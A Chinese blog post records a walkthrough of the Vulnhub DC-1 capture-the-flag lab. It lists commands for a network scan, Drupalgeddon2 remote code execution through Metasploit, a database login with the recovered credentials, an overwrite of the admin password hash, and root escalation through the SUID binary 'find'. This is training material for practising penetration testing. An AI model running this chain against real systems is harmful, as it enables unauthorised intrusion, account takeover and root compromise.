dc-1靶机渗透记录

最新推荐文章于 2024-06-12 20:22:36 发布
最新推荐文章于 2024-06-12 20:22:36 发布
阅读量152 收藏
点赞数 2
分类专栏: 渗透记录 文章标签: linux python pytorch 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlllllianqing/article/details/120618301
版权

1.在kali中输入ifconfig查看网段
在这里插入图片描述
Ip为:192.168.126.129
网段:192.168.126.0

2.使用nmap扫描网段:

nmap -sP 192.168.126.0/24

在这里插入图片描述
对该地址扫描
在这里插入图片描述

nmap -sV 192.168.126.133

在这里插入图片描述
发现80端口开放;

3.根据ip地址访问游览器
在这里插入图片描述
由左下角知该网页基于Drupal, 并且为drupal7
启动Metersploit:msfconsole
在这里插入图片描述

用search 命令查找与Drupal 有关的漏洞:search Drupal
在这里插入图片描述
选取2018的进行测试,因为有远程代码执行漏洞:

use exploit/unix/webapp/drupal_drupalgeddon2
Set RHOSTS 192.168.126.133
Run

在这里插入图片描述
列出文件列表,发现flag1.txt文件:
在这里插入图片描述
查看flag1.txt

Cat flag1.txt

在这里插入图片描述
4.百度搜索Drupal默认的文件路径:
在这里插入图片描述

cd sites
cd /default
cd default
ls

在这里插入图片描述
5.需要用到反弹shell

python -c 'import pty; pty.spawn("/bin/bash")'
mysql -udbuser -pR0ck3t

在这里插入图片描述

show databases;

在这里插入图片描述

use drupaldb
show tables;

在这里插入图片描述

select * from users;

在这里插入图片描述
由于密码为hash值,无法破解,因此选择将密码进行更改:

quit
cd /var/www
php scripts/password-hash.sh 123

在这里插入图片描述

update users set pass="$S$DHFOxgrwZAQ1QCjgXzM2XlqoNxKKLOqs2hK23.N9lNZV.OLuCIL2" where uid=1;

在这里插入图片描述

6.使用firefox登录网站;
进入网页登录,登陆后点击dashboard, 发现flag3
在这里插入图片描述
在这里插入图片描述
7.cat /etc/passwd
在这里插入图片描述

cat /home/flag4
cd /home/flag4
ls

查看flag4文件后发现需要进行提权操作
在这里插入图片描述

find / -perm -u=s -type f2>/dev/null 
find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

find / -name flag4.txt -exec "/bin/sh" \;
whoami
cd /root
ls
cat thefinalflag.txt

在这里插入图片描述

甜不拉几
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-7600 Drupal漏洞原理的简单分析与复现
锋刃科技的博客
11-12 8360
0x00组件背景 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。 0x01漏洞位置 这里有个call_user_func_array call_user_func_array函数是调用第一个参数的函数 传入的参数数第二个参数数...
Linux Crond 服务详解
IDYS'BLOG
09-26 1126
文章目录写在开头的话Linux Crond 服务详解00. Crontab命令详解01. Crontab file 文件说明1.1 Crontab -e 到底做了些什么?1.2 如何禁止某些用户使用 cron 定时任务1.3 Cron 的日志文件1.4 脚本无法执行问题02. crontab 命令演示03. 系统的配置文件: `/etc/crontab`、`/etc/cron.d/*`3.1 配置文件说明3.2 注意事项写在最后的话: 这里是一段防爬虫文本,请读者忽略。 本文原创首发于CSDN,作者ID
kali渗透DC-1
余笙.'的博客
11-21 747
kali渗透DC-1靶机
Kali入侵-Drupal(含suid提权思路)
qq_39345447的博客
04-11 857
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
记录一下 DC1靶机渗透
吃醋不爱蘸饺子的胡诌乱造
01-12 521
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里)。 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.108(这个当时扫了半天都没有扫到,我在nat网络和桥接里反复横跳,最终还是它自己好了(充分证明了当你做不出来,可以歇一歇然后自己就好了。猜测是网络切换需要一定的时间) 2.扫描这个ip地址开放的端口 可以看出来这里开放了80端口,我们可以看一下! 然后就是上图这个样子! 三.开始渗透 典型的drupal(我
VulnHub实战篇四:DC1靶机渗透记录
a1004070060的博客
04-16 1073
前言:DC-1是vulnhub系列靶机中比较有名的一台入门级靶机渗透姿势有很多种,适合初学者。本次渗透测试也是笔者自入坑vlunhub以来第一次完全独立拿下一台靶机,于是来把我的专属经验分享给大家。 0x00环境描述 靶机名称:DC-1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 攻击机ip:172.16.12.137 靶机i...
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 272
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 1191
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 342
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 774
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
MySQl基础----Linux下搭建mysql软件及登录和基本使用(附实操图超简单一看就会)
溟洵的博客
06-10 793
本章非常基础包括如何在Linux上搭建(==当然上面的SQL语句你在其他能执行SQL语句的软件上也能正常执行,并非一定要在Linux环境下==)和mysql的基本使用
Linux】生产者消费者模型——阻塞队列BlockQueue
AAlykk的博客
06-11 974
Linux有两个重要的模型,一个是生产者消费者模型——阻塞队列BlockQueue,另一个则是生产者消费者模型——环形队列RingQueue。今天我们学习其中一个模型:【Linux】生产者消费者模型——阻塞队列BlockQueue。⭐主体生产者消费模型高效在哪里?高效体现在一个线程拿出来任务可能正在做计算,它在做计算的同时,其他线程可以继续从队列中拿,继续做运算,高效并不是体现在从队列中拿数据高效!而是我们可以让一个、多个线程并发的同时计算多个任务!
Linux Shell命令vim使用
最新发布
weixin_73074505的博客
06-12 377
其中第一个直接在Linux终端在线进行,第二个则是vim编辑器中的(所谓vim编辑器可以看成将代码写进一个文件进行编辑运行)第三个vim是对文件的操作,这也是Linux最大的作用。以判断引出(学过C++其他语言容易接受)。测试当前用户对某文件是否具有“可执行”权限。测试当前用户对某文件是否具有“可读”权限。测试当前用户对某文件是否具有“可写”权限。等待时间,到时间则停止输入。参数个数 如限制密码长度。测试文件是否为普通文件。屏蔽回显,用于输入密码。输入终结符 例如输入。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值